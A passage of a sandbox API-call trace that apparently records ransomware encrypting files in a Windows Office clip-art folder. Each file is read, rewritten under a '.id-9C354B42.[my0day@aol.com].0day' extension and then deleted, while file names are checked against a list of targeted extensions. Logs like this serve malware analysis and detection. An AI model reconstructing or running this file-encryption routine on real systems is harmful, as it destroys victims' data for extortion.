liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.005] SetEndOfFile (hFile=0x380) returned 1 [0271.060] CloseHandle (hObject=0x380) returned 1 [0271.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.128] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 1 [0271.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.154] lstrlenW (lpString=".doc") returned 4 [0271.154] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.154] lstrlenW (lpString=".docx") returned 5 [0271.154] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0271.154] lstrlenW (lpString=".pdf") returned 4 [0271.155] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.155] lstrlenW (lpString=".xls") returned 4 [0271.155] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.155] lstrlenW (lpString=".xlsx") returned 5 [0271.155] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0271.155] lstrlenW (lpString=".ppt") returned 4 [0271.155] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.155] lstrlenW (lpString=".zip") returned 4 [0271.155] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.155] lstrlenW (lpString=".rar") returned 4 [0271.155] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.155] lstrlenW (lpString=".bz2") returned 4 [0271.155] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.155] lstrlenW (lpString=".7z") returned 3 [0271.155] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.155] lstrlenW (lpString=".dbf") returned 4 [0271.155] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString=".1cd") returned 4 [0271.156] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString=".jpg") returned 4 [0271.156] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString=".doc") returned 4 [0271.156] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString=".docx") returned 5 [0271.156] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0271.156] lstrlenW (lpString=".pdf") returned 4 [0271.156] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.156] lstrlenW (lpString=".xls") returned 4 [0271.156] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.156] lstrlenW (lpString=".xlsx") returned 5 [0271.156] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0271.156] lstrlenW (lpString=".ppt") returned 4 [0271.156] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString=".zip") returned 4 [0271.156] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.156] lstrlenW (lpString=".rar") returned 4 [0271.156] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.156] lstrlenW (lpString=".bz2") returned 4 [0271.156] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString=".7z") returned 3 [0271.156] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.156] lstrlenW (lpString=".dbf") returned 4 [0271.156] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.157] lstrlenW (lpString=".1cd") returned 4 [0271.157] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0271.157] lstrlenW (lpString=".jpg") returned 4 [0271.157] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.157] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.157] lstrlenW (lpString="PARNT_06.MID") returned 12 [0271.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.309] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=7768) returned 1 [0271.309] CloseHandle (hObject=0x384) returned 1 [0271.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 0x20 [0271.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.430] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.430] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.431] GetLastError () returned 0x0 [0271.431] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x1e58, lpOverlapped=0x0) returned 1 [0271.436] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x1e60, lpOverlapped=0x0) returned 1 [0271.437] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.437] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.437] SetEndOfFile (hFile=0x3a0) returned 1 [0271.437] CloseHandle (hObject=0x3a0) returned 1 [0271.437] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.437] SetEndOfFile (hFile=0x388) returned 1 [0271.441] CloseHandle (hObject=0x388) returned 1 [0271.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 1 [0271.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.441] lstrlenW (lpString=".doc") returned 4 [0271.441] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.441] lstrlenW (lpString=".docx") returned 5 [0271.441] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1 [0271.441] lstrlenW (lpString=".pdf") returned 4 [0271.441] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.441] lstrlenW (lpString=".xls") returned 4 [0271.441] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.441] lstrlenW (lpString=".xlsx") returned 5 [0271.442] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1 [0271.442] lstrlenW (lpString=".ppt") returned 4 [0271.442] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString=".zip") returned 4 [0271.442] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.442] lstrlenW (lpString=".rar") returned 4 [0271.442] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.442] lstrlenW (lpString=".bz2") returned 4 [0271.442] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.442] lstrlenW (lpString=".7z") returned 3 [0271.442] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString=".dbf") returned 4 [0271.442] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString=".1cd") returned 4 [0271.442] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString=".jpg") returned 4 [0271.442] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.442] lstrlenW (lpString=".doc") returned 4 [0271.442] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.442] lstrlenW (lpString=".docx") returned 5 [0271.442] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1 [0271.442] lstrlenW (lpString=".pdf") returned 4 [0271.442] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.443] lstrlenW (lpString=".xls") returned 4 [0271.443] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.443] lstrlenW (lpString=".xlsx") returned 5 [0271.443] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1 [0271.443] lstrlenW (lpString=".ppt") returned 4 [0271.443] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.443] lstrlenW (lpString=".zip") returned 4 [0271.443] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.443] lstrlenW (lpString=".rar") returned 4 [0271.443] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.443] lstrlenW (lpString=".bz2") returned 4 [0271.443] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.443] lstrlenW (lpString=".7z") returned 3 [0271.443] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.443] lstrlenW (lpString=".dbf") returned 4 [0271.443] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.443] lstrlenW (lpString=".1cd") returned 4 [0271.443] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0271.443] lstrlenW (lpString=".jpg") returned 4 [0271.443] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.443] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.443] lstrlenW (lpString="SAFRI_01.MID") returned 12 [0271.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.444] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=10122) returned 1 [0271.444] CloseHandle (hObject=0x388) returned 1 [0271.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 0x20 [0271.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.445] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.445] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.445] GetLastError () returned 0x0 [0271.445] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x278a, lpOverlapped=0x0) returned 1 [0271.447] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x2790, lpOverlapped=0x0) returned 1 [0271.449] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.449] WriteFile (in: hFile=0x3a0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.449] SetEndOfFile (hFile=0x3a0) returned 1 [0271.449] CloseHandle (hObject=0x3a0) returned 1 [0271.449] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.449] SetEndOfFile (hFile=0x388) returned 1 [0271.452] CloseHandle (hObject=0x388) returned 1 [0271.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 1 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString=".doc") returned 4 [0271.453] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.453] lstrlenW (lpString=".docx") returned 5 [0271.453] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.453] lstrlenW (lpString=".pdf") returned 4 [0271.453] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.453] lstrlenW (lpString=".xls") returned 4 [0271.453] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.453] lstrlenW (lpString=".xlsx") returned 5 [0271.453] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.453] lstrlenW (lpString=".ppt") returned 4 [0271.453] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString=".zip") returned 4 [0271.453] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.453] lstrlenW (lpString=".rar") returned 4 [0271.453] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.453] lstrlenW (lpString=".bz2") returned 4 [0271.453] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.453] lstrlenW (lpString=".7z") returned 3 [0271.453] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString=".dbf") returned 4 [0271.453] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString=".1cd") returned 4 [0271.453] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.453] lstrlenW (lpString=".jpg") returned 4 [0271.453] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString=".doc") returned 4 [0271.454] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.454] lstrlenW (lpString=".docx") returned 5 [0271.454] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.454] lstrlenW (lpString=".pdf") returned 4 [0271.454] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.454] lstrlenW (lpString=".xls") returned 4 [0271.454] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.454] lstrlenW (lpString=".xlsx") returned 5 [0271.454] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.454] lstrlenW (lpString=".ppt") returned 4 [0271.454] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString=".zip") returned 4 [0271.454] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.454] lstrlenW (lpString=".rar") returned 4 [0271.454] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.454] lstrlenW (lpString=".bz2") returned 4 [0271.454] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.454] lstrlenW (lpString=".7z") returned 3 [0271.454] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString=".dbf") returned 4 [0271.454] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString=".1cd") returned 4 [0271.454] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0271.454] lstrlenW (lpString=".jpg") returned 4 [0271.454] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.455] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.455] lstrlenW (lpString="SCHOL_02.MID") returned 12 [0271.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.492] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=5058) returned 1 [0271.492] CloseHandle (hObject=0x3a4) returned 1 [0271.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 0x20 [0271.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.516] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.516] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.516] GetLastError () returned 0x0 [0271.516] ReadFile (in: hFile=0x3a0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x13c2, lpOverlapped=0x0) returned 1 [0271.534] WriteFile (in: hFile=0x38c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x13d0, lpOverlapped=0x0) returned 1 [0271.535] ReadFile (in: hFile=0x3a0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.535] WriteFile (in: hFile=0x38c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.535] SetEndOfFile (hFile=0x38c) returned 1 [0271.668] CloseHandle (hObject=0x38c) returned 1 [0271.672] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.672] SetEndOfFile (hFile=0x3a0) returned 1 [0271.930] CloseHandle (hObject=0x3a0) returned 1 [0271.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 1 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString=".doc") returned 4 [0271.984] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.984] lstrlenW (lpString=".docx") returned 5 